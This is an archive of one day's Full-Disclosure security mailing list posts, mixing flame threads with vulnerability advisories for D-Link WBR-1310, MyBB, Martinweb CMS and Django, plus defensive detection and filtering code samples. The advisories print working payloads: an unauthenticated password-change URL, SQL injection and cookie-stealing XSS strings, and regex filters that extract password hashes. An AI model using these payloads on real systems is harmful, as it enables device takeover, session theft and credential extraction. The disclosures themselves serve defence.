Re: [Full-disclosure] Making Security Suck Less

2010-12-23 Thread wac
Aha, welcome to the world. It is broken and will likely keep that way
for long. So do what I do... Adapt, take a seat, wear a green hat if
you can and forget about the rest. They will not understand, nor they
want to. Besides we would see a load of net admins losing their jobs
/ companies filing bankruptcy if the model changes so...

You know what.. Bertrand Russell said once:

Men who are unhappy, like men who sleep badly, are always proud of the fact.

Sort of like the old way of saying don't worry be happy! :D

And I have serious doubts about that OSSTMM btw.



On 12/16/10, Pete Herzog li...@isecom.org wrote:
> Hi,
>
> Now not everything about the old security model is bad. Personally, I
> really like the Zen feel of it. It's like raking the fine, white,
> beach sand into those concentric lines and around rocks and dead fish
> and stuff. It's very Zen. Then as the tide rises, the wind blows, and
> Frisbees get badly thrown you have to do it all over again in a very
> Zen way like this: Install. Harden. Configure. Patch. Scan. Patch
> again. Update. Re-configure. Scan. Patch again. Uninstall. Re-install.
> Configure. And then you do it all over again! With so much Zen
> practice it's hard not to become a Master of the security repeat
> cycle. But you know what else is Zen? NOT doing that. It's less
> stressful to maintain an existing balance between operations,
> limitations, and controls than running around and putting out fires.
>
> This is from my new article called, Making Security Suck Less you
> can read finished at:
>
> https://www.infosecisland.com/blogview/10304-Making-Security-Suck-Less.html
>
> There's some more, new articles reviewing the OSSTMM and the new
> security model at InfoSec Island here:
>
> https://www.infosecisland.com/osstmm.html
>
> Sincerely,
> -pete.
>
> --
> Pete Herzog - Managing Director - p...@isecom.org
> ISECOM - Institute for Security and Open Methodologies
> www.isecom.org - www.osstmm.org
> www.hackerhighschool.org - www.badpeopleproject.org
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/




[Full-disclosure] OpenBSD Smoking Gun

2010-12-23 Thread Григорий Братислава
Hello Full Disclosure!!!

Musntlive has warned you all about
OpenB(ackdoored)S(oftwared)D(istrobution) for is some time and is all
say musntlive is crazy. However is now when Theo discloses bug, is
people like Paul I is like to smell scrotum Schmehl in silence. In
trusting trust you is now see how OpenBSD via two developers allows
for backdoor in IPSEC since is Theo and no one else audit those two
clownskis.

We now is have proof

1) OpenBSD is not as audited as they say
2) Is Fox Mulder say Is Trust No One
3) Paul Schmehl is not longer jumping on Theo scrotum bandwagon
4) Is now OpenBSD need new slogan: `No remote exploits in years - only
backdoors`



Re: [Full-disclosure] adobe.com important subdomain SQL injection again!

2010-12-23 Thread Pavel Kankovsky
On Mon, 20 Dec 2010, Marsh Ray wrote:

> OK, so if sandboxing works, then why not just let devs build x86/x64
> code in the first place? In the same category as Native Client or ActiveX.

And get rid of the only good feature (or perhaps one of the few good
features)  of Flash (its ability to present the same content on various
OSes and CPU architectures)?

> Remember chapter 1 of the textbook when it said The first rule of
> security is never try to retrofit security, _ever_!! and underlined it
> three times?

I guess there must be a complementary rule in chapter 1 of software 
project management textbooks reading Do not ever take security into 
consideration when the system is being developed. Security is supposed to 
be an afterthought (and additional expense for the customer)! Always!
In bright red blinking (*) 48pt letters. :(

(*) An amazing feat in a printed book but the wonders of modern technology
will make it possible soon.

-- 
Pavel Kankovsky aka Peak  / Jeremiah 9:21\
For death is come up into our MS Windows(tm)... \ 21st century edition /



[Full-disclosure] MS warns over zero-day IE bug

2010-12-23 Thread Georgi Guninski
theregister quotes our ultra-mega-elite list:
http://www.theregister.co.uk/2010/12/23/ms_zero_day/

Merry Christmas and all the best in the new year!


-- 
joro



[Full-disclosure] D-Link WBR-1310 Authentication Bypass Vulnerability

2010-12-23 Thread Craig Heffner
The CGI scripts in the WBR-1310 (firmware v.2.00) do not validate
authentication credentials. Administrative settings can be changed by
sending the appropriate HTTP request directly to a CGI script without
authenticating to the device.

The following request will change the administrative password to 'hacked'
and enable remote administration on port 8080:
http://192.168.0.1/tools_admin.cgi?admname=admin&admPass1=hacked&admPass2=hacked&username=user&userPass1=WDB8WvbXdHtZyM8&userPass2=WDB8WvbXdHtZyM8&hip1=*&hport=8080&hEnable=1

Even if remote administration is not enabled, any Web page that any internal
user browses to can change the administrator password and enable remote
administration via a hidden image tag embedded in the Web page. No
Javascript required.

Newer versions of the WBR-1310 firmware are not vulnerable, but since
version 2.00 is the default firmware, most WBR-1310 routers are still
running it.
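
A detection sketch for the request described above, added here as an example and not part of the original advisory: it scans HTTP request logs for calls to `tools_admin.cgi` that set the password or remote-administration parameters, and marks the ones whose Referer is another site (the hidden image tag case). The log layout, the sample lines and the function names are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

ADMIN_SCRIPT = "/tools_admin.cgi"
# Parameter names as they appear in the advisory's request.
SETTING_PARAMS = {"admPass1", "admPass2", "hport", "hEnable"}

# Assumed log layout (constructed for this example):
#   client [timestamp] "METHOD absolute-url HTTP/x.y" status "referer"
LOG_RE = re.compile(
    r'(?P<client>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<referer>[^"]*)"'
)

# Constructed sample lines; hosts and password values are placeholders.
SAMPLE_LOG = """\
10.0.0.23 [23/Dec/2010:10:01:02 +0000] "GET http://192.168.0.1/tools_admin.cgi?admname=admin&admPass1=PLACEHOLDER&admPass2=PLACEHOLDER&hip1=*&hport=8080&hEnable=1 HTTP/1.1" 200 "http://blog.example.net/post.html"
10.0.0.5 [23/Dec/2010:10:05:40 +0000] "GET http://192.168.0.1/tools_admin.cgi?admname=admin&admPass1=PLACEHOLDER&admPass2=PLACEHOLDER&hEnable=0 HTTP/1.1" 200 "http://192.168.0.1/tools_admin.htm"
10.0.0.23 [23/Dec/2010:10:06:11 +0000] "GET http://192.168.0.1/index.htm HTTP/1.1" 200 "-"
10.0.0.9 [23/Dec/2010:10:07:30 +0000] "GET http://www.example.org/tools_admin.cgi?admPass1=PLACEHOLDER HTTP/1.1" 404 "-"
"""


def inspect_line(line, router_hosts):
    """Return a finding dict for a settings change sent to a router, else None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    url = urlsplit(m["url"])
    if url.hostname not in router_hosts or url.path != ADMIN_SCRIPT:
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    changed = sorted(SETTING_PARAMS & params.keys())
    if not changed:
        return None
    # "-" or an empty Referer parses to hostname None.
    referer_host = urlsplit(m["referer"]).hostname
    return {
        "client": m["client"],
        "time": m["ts"],
        "params": changed,  # names only; the password values are never copied
        # A page on another site triggered the request (image tag, link, ...).
        "cross_site": referer_host is not None and referer_host not in router_hosts,
        "enables_remote_admin": params.get("hEnable") == ["1"],
    }


def scan(log_text, router_hosts):
    """Inspect every log line and collect the findings in order."""
    findings = []
    for line in log_text.splitlines():
        hit = inspect_line(line, router_hosts)
        if hit is not None:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, {"192.168.0.1"}):
        print(finding)
```
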

[Full-disclosure] Secunia Research: Microsoft Word LFO Parsing Double-Free Vulnerability

2010-12-23 Thread Secunia Research
== 

 Secunia Research 23/12/2010

- Microsoft Word LFO Parsing Double-Free Vulnerability -

== 
Table of Contents

1) Affected Software
2) Severity
3) Vendor's Description of Software
4) Description of Vulnerability
5) Solution
6) Time Table
7) Credits
8) References
9) About Secunia
10) Verification

== 
1) Affected Software 

* Microsoft Word 2002 (10.6856.6858) SP3

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  From remote

== 
3) Vendor's Description of Software 

Office Word ... provides editing and reviewing tools that help you
create professional documents more easily than ever before.

Product Link:
http://office.microsoft.com/en-us/word/default.aspx

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Word, 
which can be exploited by malicious people to potentially compromise 
a user's system.

The vulnerability is caused by a double-free error when processing LFO
(List Format Override) records and can be exploited to corrupt memory 
via a specially crafted Word document.

Successful exploitation may allow execution of arbitrary code.

== 
5) Solution 

Apply patches provided by MS10-079.

== 
6) Time Table 

25/05/2010 - Vendor notified.
25/05/2010 - Vendor response.
22/12/2010 - Vendor informs that due to a mishap the vulnerability
 report fell off their radar. The vulnerability has in the 
 meantime been fixed by MS10-079, which will be updated 
 accordingly with proper credits.
23/12/2010 - Public disclosure.

== 
7) Credits 

Discovered by Alin Rad Pop, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-3217 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-76/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==



Re: [Full-disclosure] OpenBSD has Open Backdoored Software Distribution - admitted by Theo

2010-12-23 Thread Carlos Alberto Lopez Perez
On 12/23/2010 01:36 AM, mrx wrote:
> On 23/12/2010 00:00, Dan Kaminsky wrote:
> On Wed, Dec 22, 2010 at 3:47 PM, Dave Nett dave.n...@yahoo.com wrote:
>
> http://marc.info/?l=openbsd-tech&m=129296046123471&w=2
>
> Long mail which just admit has backdoor, poor Theo.
>
> (g) I believe that NETSEC was probably contracted to write backdoors
> as alleged.
> (h) If those were written, I don't believe they made it into our
> tree.  They might have been deployed as their own product.
>
> You had only one more sentence to read!  Just one!
>
>  where would you start auditing the code? It's just too much.
>
> Actually, it is a very small part of the tree...
>
> I am aware that compilers can be coded to introduce features into binaries
> that are not in the actual source code itself.
> So with all due respect and possibly much ignorance on my part, what is a
> code audit going to achieve if one uses the shipped compiler to
> compile the source? Unless one codes ones own compiler can any binary be
> trusted?
>
 
I am also aware that processors can have hidden features that make them
execute a slightly different program than the one you expect to be executed.
So, can we trust processors unless you make your own processor?

For example think about the new Intel processors that are shipped with the
AES-NI [1] instruction set. How difficult would it be for governments and
powerful people/companies to hide a trojan horse in these processors? And
would you ever notice the existence of this hidden feature?

[1] http://en.wikipedia.org/wiki/AES_instruction_set

> Would not reversing the compiled code lead to a proper insight? Are the
> compiled binaries that handle these crypto functions so complex that
> they cannot be reversed by a skilled assembly coder? I guess that such a
> coder would have to be an expert cryptographer too, or at least
> collaborate with one.
>
> My curiosity is genuine, I am trying to educate myself about such things.
>
> regards
> Dave
 
 


Re: [Full-disclosure] Making Security Suck Less

2010-12-23 Thread Pete Herzog
So the world needs more people to just accept the problems? I 
disagree. We're trying to fix a broken model by presenting new steps, 
new methods, and new directions. By helping seek improvements I
sleep soundly at night. To each his own, I suppose.

Your doubts are welcomed. Please submit your corrections and ideas for 
improvement.

Sincerely,
-pete.

-- 
Pete Herzog - Managing Director - p...@isecom.org
ISECOM - Institute for Security and Open Methodologies
www.isecom.org - www.osstmm.org
www.hackerhighschool.org - www.badpeopleproject.org


On 12/23/2010 9:26 AM, wac wrote:
> Aha, welcome to the world. It is broken and will likely keep that way
> for long. So do what I do... Adapt, take a seat, wear a green hat if
> you can and forget about the rest. They will not understand, nor they
> want to. Besides we would see a load of net admins losing their jobs
> / companies filing bankruptcy if the model changes so...
>
> You know what.. Bertrand Russell said once:
>
> Men who are unhappy, like men who sleep badly, are always proud of the fact.
>
> Sort of like the old way of saying don't worry be happy! :D
>
> And I have serious doubts about that OSSTMM btw.



[Full-disclosure] www.eVuln.com : search - Non-persistent XSS in Social Share

2010-12-23 Thread Aliaksandr Hartsuyeu
www.eVuln.com advisory:
search - Non-persistent XSS in Social Share
Summary: http://evuln.com/vulns/169/summary.html 
Details: http://evuln.com/vulns/169/description.html 

---Summary---
eVuln ID: EV0169
Software: Social Share
Vendor: n/a
Version: 2010-06-05
Critical Level: low
Type: Cross Site Scripting
Status: Unpatched. No reply from developer(s)
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )

Description
It is possible to inject xss code into search parameter in
search.php script.
Parameter search is not properly sanitized before being used in HTML
code.

PoC/Exploit
PoC code is available at:
http://evuln.com/vulns/169/exploit.html 

-Solution--
Not available

--Credit---
Vulnerability discovered by Aliaksandr Hartsuyeu
http://evuln.com/code-analysis.html - source code analysis service




Re: [Full-disclosure] OpenBSD Smoking Gun

2010-12-23 Thread Blank Reg
> Musntlive has warned you all about
> OpenB(ackdoored)S(oftwared)D(istrobution) for is some time and is all

At risk of feeding the troll, this whole business has a positive side 
that no-one seems to have mentioned:

1 The seeding of evil developers into large software projects by The 
Man(tm) has now shifted from conspiracy theory to conspiracy in many 
peoples minds.

2 OpenBSD is the only project *we currently know of* that has been 
infiltrated. It seems highly likely that other projects/OS's will have 
been similarly treated.

3 As a result of being Open Source, the damage to OpenBSD's IPSec 
stack was pretty pathetic, and is now subject to scrutiny. In the end 
this will lead to the OpenBSD IPSec being the *only* trustworthy 
implementation.

4 A big questionmark now hangs over the security of closed-source crypto 
implementations. Seriously, can anyone really trust Windows IPSec after 
this incident? Do you trust your Apple AES-128 encrypted dmg 
files?

Reg



Re: [Full-disclosure] OpenBSD Smoking Gun

2010-12-23 Thread Paul Schmehl
--On December 23, 2010 6:51:27 AM -0500 Григорий 
Братислава musntl...@gmail.com wrote:

> Hello Full Disclosure!!!
>
> Musntlive has warned you all about
> OpenB(ackdoored)S(oftwared)D(istrobution) for is some time and is all
> say musntlive is crazy. However is now when Theo discloses bug, is
> people like Paul I is like to smell scrotum Schmehl in silence. In
> trusting trust you is now see how OpenBSD via two developers allows
> for backdoor in IPSEC since is Theo and no one else audit those two
> clownskis.
>
> We now is have proof


Yes, we have.  In Musntliveland every bug is a backdoor and every 
programmer is a liar.  Only Musntlive is speak truth since is Mustntlive 
only who speak out is against unholy 
OpenBecauseISayIsBackdoorYouMustBelieveSoftwareIsDistribution.

Have a Merry Christmas, Mustntlive.  You've livened up the holiday season, 
no doubt.

Paul IsMaybeSmellScrotumSomehow Schmehl

Is Musntlive son of former Pravda reporter?  (Because wonder where is 
fountain of all knowledge and truth is come from.


Re: [Full-disclosure] OpenBSD Smoking Gun

2010-12-23 Thread Georgi Guninski
may i have a *legal* posting email at this lovely domain fuckhotmail.com, 
please?

i suspect i have some reputation points left :)

(let me know if i am begging in vain, i had the impression i can't register it 
myself)


On Thu, Dec 23, 2010 at 01:46:48PM +, Blank Reg wrote:
> > Musntlive has warned you all about
> > OpenB(ackdoored)S(oftwared)D(istrobution) for is some time and is all
>
> At risk of feeding the troll, this whole business has a positive side
> that no-one seems to have mentioned:
>
> 1 The seeding of evil developers into large software projects by The
> Man(tm) has now shifted from conspiracy theory to conspiracy in many
> peoples minds.
>
> 2 OpenBSD is the only project *we currently know of* that has been
> infiltrated. It seems highly likely that other projects/OS's will have
> been similarly treated.
>
> 3 As a result of being Open Source, the damage to OpenBSD's IPSec
> stack was pretty pathetic, and is now subject to scrutiny. In the end
> this will lead to the OpenBSD IPSec being the *only* trustworthy
> implementation.
>
> 4 A big questionmark now hangs over the security of closed-source crypto
> implementations. Seriously, can anyone really trust Windows IPSec after
> this incident? Do you trust your Apple AES-128 encrypted dmg
> files?
>
> Reg
 


[Full-disclosure] MyBB 1.6 <= SQL Injection Vulnerability

2010-12-23 Thread YGN Ethical Hacker Group
=
 MyBB 1.6 <= SQL Injection Vulnerability
=



1. OVERVIEW

Potential SQL Injection vulnerability was detected in MyBB.


2. APPLICATION DESCRIPTION

MyBB is a free bulletin board system software package developed by the
MyBB Group.
It's supposed to be developed from XMB and DevBB bulletin board applications.


3. VULNERABILITY DESCRIPTION

The keywords parameter was not properly sanitized in /private.php
and /search.php which leads to SQL Injection vulnerability.
Full exploitation  possibility is probably mitigated by clean_keywords
and clean_keywords_ft functions in inc/functions_search.php.


4. VERSIONS AFFECTED

MyBB 1.6 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

= /search.php

POST /mybb/search.php

action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1


= /private.php

POST /mybb/private.php

my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff


6. SOLUTION

Upgrade to 1.6.1


7. VENDOR

MyBB Development Team
http://www.mybb.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-12-09: notified vendor
2010-12-15: vendor released fixed version
2010-12-24: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
About MyBB: http://www.mybb.com/about/mybb


#yehg [2010-12-24]


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



[Full-disclosure] Django admin list filter data extraction / leakage

2010-12-23 Thread Adam Baldwin
ADVISORY INFORMATION:
Advisory ID: NGENUITY-2010-009
Date discovered: 8.28.2010
Date published: 12.22.2010

SOFTWARE AFFECTED:
“Django is a high-level Python Web framework that encourages rapid
development and clean, pragmatic design.” [1]
The admin interface of the Django web framework can be abused to extract
information, such as user password hashes via list filters. Version
1.1.2, 1.2.3 and before are affected. The advisory from the Django dev
team can be found here [2].

TECHNICAL DETAILS:
The principle behind the vulnerability is similar to blind sql
injection, but abuses a feature of t We can use list filters to follow
foreign keys into models and data our user should not normally have
access to. Using regular expressions gives us a lot of flexibility to
work our way down the value we want to extract.

For a model that has a created_by field that points to a User object we
could extract the password hash using a request similar to the below.
http://example.com/admin/testapp/testmodel/?created_by__password__regex=^sha1\$[0-9]$
http://example.com/admin/testapp/testmodel/?created_by__password__regex=^sha1\$[a-f]$


Authentication as a staff user in the admin is required to exploit this
vulnerability. Here's looking at you CMS apps!

CREDIT:
This vulnerability was discovered by Adam Baldwin
mailto:adam_bald...@ngenuity-is.com

REFERENCES:
[1] - http://www.djangoproject.com
[2] - http://www.djangoproject.com/weblog/2010/dec/22/security/
[3] -
http://ngenuity-is.com/advisories/2010/dec/22/information-leakage-in-django-administrative-inter/
[4] -
http://evilpacket.net/2010/dec/22/information-leakage-django-administrative-interfac/
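
One way to express the check that closes this hole, added here as an example and not taken from the advisory or from Django's own code: treat every changelist query key as a lookup path and accept it only if the path is one the admin declared in `list_filter`. The function names, the set of non-filter parameters and the sample query are assumptions made for this example, and the logic is a simplification of what a framework has to do.

```python
from urllib.parse import parse_qsl

# Lookup suffixes that may end an ORM lookup key (subset, for the example).
LOOKUP_TYPES = {
    "exact", "iexact", "contains", "icontains", "in", "gt", "gte", "lt",
    "lte", "startswith", "istartswith", "endswith", "iendswith", "range",
    "year", "month", "day", "isnull", "search", "regex", "iregex",
}

# Assumed names of changelist parameters that are not filters
# (search, paging, ordering).
NON_FILTER_PARAMS = {"q", "p", "o", "ot"}


def field_path(key):
    """Strip a trailing lookup type: 'a__b__regex' -> 'a__b'."""
    parts = key.split("__")
    if len(parts) > 1 and parts[-1] in LOOKUP_TYPES:
        parts = parts[:-1]
    return "__".join(parts)


def allowed_paths(list_filter):
    """Paths a changelist may filter on: each declared field, plus the
    primary key of the related object for filters on relations."""
    paths = set()
    for name in list_filter:
        paths.update({name, name + "__id", name + "__pk"})
    return paths


def check_changelist_query(query, list_filter):
    """Split the query keys into (accepted, rejected) lookups.

    Anything that walks past a declared filter field, such as
    created_by__password__regex, is rejected before it reaches the ORM.
    """
    permitted = allowed_paths(list_filter)
    accepted, rejected = [], []
    for key, _value in parse_qsl(query, keep_blank_values=True):
        if key in NON_FILTER_PARAMS:
            continue
        if field_path(key) in permitted:
            accepted.append(key)
        else:
            rejected.append(key)
    return accepted, rejected


# Constructed query: the lookup from the advisory next to ordinary filters.
SAMPLE_QUERY = (
    "created_by__password__regex=%5Esha1%5C%24%5B0-9%5D"
    "&status__exact=open&created_by__id__exact=3&q=report&p=2"
)

if __name__ == "__main__":
    ok, bad = check_changelist_query(SAMPLE_QUERY, ["created_by", "status"])
    print("accepted:", ok)
    print("rejected:", bad)
```

A rejected key should produce an error response that does not depend on whether the pattern matched, since the leak comes from the difference between an empty and a non-empty result list.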




[Full-disclosure] Vulnerabilities in Martinweb CMS

2010-12-23 Thread MustLive
Hello Full-Disclosure!

I want to warn you about vulnerabilities in Martinweb CMS. It's
Ukrainian commercial CMS (which is used particularly at web sites of
security companies and banks).

-
Affected products:
-

Vulnerable are possibly all versions of Martinweb CMS.

--
Details:
--

XSS (WASC-08):

http://site/sitesearch/page--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.html

http://site/index.php?pages='language=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (with MouseOverJacking) (WASC-08):

http://site/index.php?op=searchsearch='style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'

http://site/index.php?op=searchpages=1'style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'

SQL DB Structure Extraction (WASC-13):

http://site/index.php?pages=’


Timeline:


2010.10.11 - announced at my site.
2010.10.12 - informed developers.
2010.10.13 - additionally informed developers (because official e-mail was
forgotten and overfull).
2010.12.22 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4594/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



[Full-disclosure] [ MDVSA-2010:259 ] pidgin

2010-12-23 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:259
 http://www.mandriva.com/security/
 ___

 Package : pidgin
 Date: December 23, 2010
 Affected: 2009.0, 2010.0, 2010.1
 ___

 Problem Description:

 A null pointer dereference due to receiving a short packet for a direct
 connection in the MSN code could potentially cause a denial of service.
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 This update provides pidgin 2.7.8 that has been patched to address
 this flaw.
 ___

 References:

 http://pidgin.im/news/security/
 ___

 Updated Packages:


[Full-disclosure] How long was the twitter outage?

2010-12-23 Thread Georgi Guninski
How long was the twitter outage from yesterday coinciding with the other
outage?



[Full-disclosure] [IMF 2011] 2nd Call - Deadline Extended

2010-12-23 Thread Oliver Goebel
Dear all,

the deadline for the submission of papers to IMF 2011 has been extended.

Accepted papers will be published in IEEE Computer Society's Conference
Proceedings Series and be available in the IEEE online Digital Library.

Please excuse possible cross-postings.



CALL FOR PAPERS

   IMF 2011

  6th International Conference
   on IT Security Incident Management & IT Forensics

 May 10th - 12th, 2011
  Stuttgart, Germany

  DEADLINE EXTENSION!



PAPER SUBMISSION

The deadline for paper submissions has been extended to January 17th,
2011.  Notification of acceptance will be sent on January 31st.
Camera ready paper copies must be submitted until February 7th, 2011.

Papers can be submitted via the page found at:
http://www.imf-conference.org/imf2011/submission.html

Accepted papers will be published in IEEE Computer Society's Conference
Proceedings Series and be available in the IEEE online Digital Library.



Conference Background
-
IT-Security has become a steady concern for all entities operating
IT-Systems. These include enterprises, governmental and non-governmental
organizations, as well as individuals.  Yet, despite high-end
precautionary measures taken, not every attack or security mishap can be
prevented and hence incidents will go on happening.  In such cases
forensic capabilities in investigating incidents in both technical and
legal aspects are vital to understand their issue and feed back the
knowledge gained into the security process.  Documenting the measures
taken to prevent or minimize damage to own or external IT infrastructure
provides legal rear cover if an involved party decides to start
proceedings. In a possible lawsuit emerging from such an incident, its
treatment in a forensically proper way is crucial to be able to possibly
claim for damages or prevent from being threatened by claims of third
parties.  Thus, capable incident response and forensic procedures have
become an essential part of IT infrastructure operations.

In law enforcement IT forensics is an important branch and its
significance constantly increases since IT has become an essential part
in almost every aspect of daily life.  IT systems produce traces and
evidence in many ways that play a more and more relevant role in
resolving cases.


Conference Goals

IMF's intent is to gather experts from throughout the world in order to
present and discuss recent technical and methodical advances in the
fields of IT security incident response and management and IT forensics.
The conference provides a platform for collaboration and exchange of
ideas between industry (both as users and solution providers), academia,
law-enforcement and other government bodies.


Conference Topics
--
The scope of IMF 2011 is broad and includes, but is not limited to the
following areas:

IT Security Incident Response

- Procedures and Methods of Incident Response
- Formats and Standardization for Incident Response
- Tools Supporting Incident Response
- Incident Analysis
- CERTs/CSIRTs
- Sources of Information, Information Exchange, Communities
- Dealing with Vulnerabilities (Vulnerability Response)
- Monitoring and Early Warning
- Education and Training
- Organizations
- Legal and Enterprise Aspects (Jurisdiction, Applicable  Laws
  and Regulations)

IT Forensics

- Trends and Challenges in IT Forensics
- Application of forensic techniques in new areas
- Techniques, Tools in Procedures IT Forensics
- Methods for the Gathering, Handling, Processing and Analysis of
  Digital Evidence
- Evidence Protection in IT Environments
- Standardization in IT Forensics
- Education and Training
- Organizations
- Legal and Enterprise Aspects (Jurisdiction, Applicable Laws and
  Regulations)


Submission Details
--
IMF invites to submit full papers, presenting novel and mature research
results as well as practice papers, describing best practices, case
studies or lessons learned of up to 20 pages.  Proposals for workshops,
discussions and presentations on practical methods and challenges are
also welcome.

All submissions must be written in English (see below), and either in
postscript or PDF format.  Authors of accepted papers must ensure that
their papers will be presented at the conference.
Submitted full papers must not substantially overlap papers that have
been published elsewhere or that are simultaneously submitted to a
journal or a conference with proceedings.

All submissions will be reviewed by the program committee and papers
accepted to be presented at the conference will be included in the
conference proceedings.

Details on the electronic submission procedure as well 

Re: [Full-disclosure] How long was the twitter outage?

2010-12-23 Thread John Adams
The site was not down for all users. A small number of users were affected
by the failure of specific database node.

Please see our status blog for details.

http://status.twitter.com

-j

On Thu, Dec 23, 2010 at 12:23 PM, Georgi Guninski gunin...@guninski.com wrote:

 How long was the twitter outage from yesterday coinciding with the other
 outage?


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How long was the twitter outage?

2010-12-23 Thread Eyeballing Weev
More like Justin Bieber's nodes failed

On 12/23/2010 04:39 PM, John Adams wrote:
 A small number of users were affected by the failure of specific
 database node.



Re: [Full-disclosure] How long was the twitter outage?

2010-12-23 Thread Thor (Hammer of God)
I tried to check your status blog, but the site is down for me.  Just sayin'.

t

From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of John Adams
Sent: Thursday, December 23, 2010 1:40 PM
To: Georgi Guninski
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] How long was the twitter outage?

The site was not down for all users. A small number of users were affected by 
the failure of specific database node.

Please see our status blog for details.

http://status.twitter.com

-j

Re: [Full-disclosure] How long was the twitter outage?

2010-12-23 Thread Thor (Hammer of God)
Because Georgi has reputation points left.  He can say whatever he wants.  :)

From: Cal Leeming [Simplicity Media Ltd] 
[mailto:cal.leem...@simplicitymedialtd.co.uk]
Sent: Thursday, December 23, 2010 3:13 PM
To: Thor (Hammer of God)
Cc: John Adams; Georgi Guninski; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] How long was the twitter outage?

No doubt someone will bitch at me for asking this but, why on earth is this 
being discussed on full-disclosure? lol.

Re: [Full-disclosure] How long was the twitter outage?

2010-12-23 Thread Cal Leeming [Simplicity Media Ltd]
No doubt someone will bitch at me for asking this but, why on earth is this
being discussed on full-disclosure? lol.

On Thu, Dec 23, 2010 at 10:46 PM, Thor (Hammer of God) t...@hammerofgod.com
 wrote:

  I tried to check your status blog, but the site is down for me.  Just
 sayin’.



 t




Re: [Full-disclosure] How long was the twitter outage?

2010-12-23 Thread Cal Leeming [Simplicity Media Ltd]
Oh noes, my email fell under the category of Common  Mild profanity.

Profanity content filtering is ridiculous, it's the kinda thing not even
most parents would do on their kids computers.

I can understand filtering outgoing mail for profanity if it is a corporate
company, but ffs lol.

-- Forwarded message --
From: r...@bellaliant.ca
Date: Thu, Dec 23, 2010 at 11:29 PM
Subject: Your email message was blocked
To: cal.leem...@simplicitymedialtd.co.uk


The following email message was *blocked* by Bell Aliant Content Filtering
Device:

   *From:*      cal.leem...@simplicitymedialtd.co.uk
   *To:*        peter.mo...@bellaliant.ca
   *Subject:*   Re: [Full-disclosure] How long was the twitter outage?
   *Message:*   B4d13db61.0001.0003.mml

Because it may contain *unacceptable language*, or *inappropriate material*.
Please remove any unacceptable or inappropriate language and resend the
message.

The blocked email will be automatically deleted after *5 days.*
Content Rule: Policy Management (Inbound) : Block Common  Mild Profanity

r...@bellaliant.ca

On Thu, Dec 23, 2010 at 11:18 PM, Thor (Hammer of God) t...@hammerofgod.com
 wrote:

  Because Georgi has “reputation points left.”  He can say whatever he
 wants.  :)




Re: [Full-disclosure] How long was the twitter outage?

2010-12-23 Thread Thor (Hammer of God)
LOL.  I got one too.  Maybe we should all send emails telling him his filter 
isn't worth hen shit on a pump handle!


The following email message was blocked by Bell Aliant Content Filtering Device:

   From:      t...@hammerofgod.com
   To:        peter.mo...@bellaliant.ca
   Subject:   Re: [Full-disclosure] How long was the twitter outage?
   Message:   B4d13d9050001.0001.0003.mml

Because it may contain unacceptable language, or inappropriate material.  
Please remove any unacceptable or inappropriate language and resend the message.

The blocked email will be automatically deleted after 5 days.

Content Rule: Policy Management (Inbound) : Block Common  Mild Profanity

r...@bellaliant.ca


From: Cal Leeming [Simplicity Media Ltd] 
[mailto:cal.leem...@simplicitymedialtd.co.uk]
Sent: Thursday, December 23, 2010 3:34 PM
To: Thor (Hammer of God); full-disclosure@lists.grok.org.uk
